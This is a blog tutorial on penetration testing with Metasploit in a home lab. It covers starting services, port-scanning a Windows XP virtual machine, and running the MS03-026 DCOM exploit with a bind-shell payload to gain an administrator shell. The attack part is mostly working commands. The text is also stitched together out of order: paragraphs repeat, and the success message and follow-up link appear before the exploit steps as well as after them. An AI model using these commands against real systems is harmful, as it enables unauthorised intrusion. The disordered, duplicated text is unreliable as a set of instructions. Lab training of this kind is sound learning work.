Our
approach to penetration testing is going to be simple. I already made a
post about the ideal way to begin penetration testing. But we aren't
going to ideal way. I'm gonna teach you penetration testing the way I
learnt it. By doing actual penetration and exploitation. We can't hack completely patched Windows 7 or Windows 8
right in this tutorial, but we can definitely hack an unpatched
Windows XP machine. However, to do that, you need to victim machine.
Testing this method on someone else's computer is not recommended and is
quite illegal. It is strongly advised to create your own virtual
machine and test exploits there.
With PostgreSQL up and running, we next need to launch the metasploit service. The first time the service is launched, it will create a msf3 database user and a database called msf3. The service will also launch the Metasploit RPC and Web servers it requires.
If you had not been using an unpatched version of Windows, there will not be any vulnerable ports.
What are you going to need
Knowledge
- Basic Penetration testing terms (I recommend that you take a look here, as I'm going to use the terms freely without any explanation here in this tutorial)
- The tough manual way of penetration testing (A large patch of advanced material which will help you become a great pentester if you have the patience to read it all and capability to understand it)
- VMWare tools (Without Vmware tools there is no way you can have a Kali linux (attacker machine) and unpatched XP (target machine) running at the same time in one single computer)
Virtual Machines
- Kali linux ( Click the link for a complete detailed guide)
- Windows XP (After you've followed the tutorial above for installing Kali linux, installing XP on a VM will be a piece of cake, a few screenshots of the process)
Now there is catch in Windows XP. While Kali linux is free, Windows XP
is not. So you have to buy one. I'm dead against piracy, and won't
promote anything of that kind on my blog. Just make sure that when you
are buying a Windows XP cd, it is unpatched and SP1. If it is patched
then the exploits won't work. Your best bet would be to look up your
shelves to find an old XP cd that you bought years ago which is catching
dust, and put it to some use.
A look at Metasploit Framework
Starting the framework
"In keeping with the Kali Linux Network Services Policy, there are no
network services, including database services, running on boot so there
are a couple of steps that need to be taken in order to get Metasploit
up and running with database support." Simply speaking, there are some
services that metasploit needs which aren't started with system startup.
So here's some commands you need to execute on your console before you
can start metasploit
service postgresql start(Metasploit uses PostgreSQL as its database so it needs to be launched first.)
With PostgreSQL up and running, we next need to launch the metasploit service. The first time the service is launched, it will create a msf3 database user and a database called msf3. The service will also launch the Metasploit RPC and Web servers it requires.
service metasploit startNow finally we are ready to start metasploit framework.
msfconsole
Looking at the targets
Right now, my metasploit framework is running on Kali on Vmware on a Windows 8 machine. Also, there is a Windows XP Sp3 virtual machine running side my side with my Kali. So what we need to do is detect these machines in Metasploit framework. For this we'll do a port scan.Port Scan
Metasploit offers an awesome port scanning function which goes by the
name auxiliary scanner. Here is the command to execute this scan
To use this feature, enter the following code-
use auxiliary/scanner/portscan/tcpType show options to see the available options
show optionsNow we have to change a few settings, firstly, we should reduce the number of ports scanned
set ports 1-500Secondly, we have to specify a target IP to scan. Now this is a bit tricky, as the IP is not going to be the same in all cases. So here's what you'll do. Go to your XP virtual machine (the one you are trying to hack). Open command prompt and type
ipconfigIn the results, check the IP of the machine. This is what you'll have to specify the RHOSTS option as.
In my case the IP is 192.168.63.131
Now go back to your Kali machine, and type the fol (change the IP as required)
set RHOST 192.168.63.131Here's what it should look like
There's a slight error here, I spelled RHOSTS wrong. Make sure you add the 's' in the end. |
Now we are ready for some action, do a show options again to see what all changes you've made. Finally, type-
runThe scan will start and after some time it will show you which tcp ports are open and vulnerable to attack.
If you had not been using an unpatched version of Windows, there will not be any vulnerable ports.
This basically means that there are no open ports here. Nothing much you
can do. However if you had some good luck there, and had a vulnerable
machine, you will have some vulnerable ports. In my case, I turned off
the firewall on the windows machine and run the auxiliary module again.
Now we know we have a target at IP 192.168.63.131 and it has port 135 139 and 445 open.
I got 3 open ports this time. If you are using some higher XP version, you too might need to disable firewall in order to get open ports.
Now we know we have a target at IP 192.168.63.131 and it has port 135 139 and 445 open.
Real life port scan
In actual pentesting environment, you don't know about the IP, open ports and OS of the target computer. In such cases, we can use Nmap port scanner which is much better than auxiliary. We'll come to that later.Finding Exploits
This step is important. We need to figure out which exploits work on the OS we are attacking. In our case, we already know what to do. Type back to get out of auxiliary scanner. Search for dcom on msfconsole.search dcomThis is a very famous exploit for Windows.
Copy the exploit number 3. (Which shows great as rank). In the next line, type
And here's the best part
You have now successfully broken into the target computer. You have an open shell on the target computer with administrator privileges. In short, you own that computer now. Try out what all you can do from here on. I'll come up with more in the next tutorial.
Update - The next tutorial is here. It discusses the post exploitation fun that you can have with the meterpreter payload. Post exploitation fun in an exploited xp machine
We have a pentesting lab now and have successfully exploited an XP machine.
use exploit/windows/dcerpc/ms03_026_dcomYou are now using the most famous Windows exploit. Type show options again
show optionsAgain, set the RHOST as 192.168.63.131 (replace with the IP of your target)
set RHOST 192.168.63.131Also, set a payload.
set PAYLOAD windows/shell_bind_tcp
And here's the best part
exploit
You have now successfully broken into the target computer. You have an open shell on the target computer with administrator privileges. In short, you own that computer now. Try out what all you can do from here on. I'll come up with more in the next tutorial.
Update - The next tutorial is here. It discusses the post exploitation fun that you can have with the meterpreter payload. Post exploitation fun in an exploited xp machine
We have a pentesting lab now and have successfully exploited an XP machine.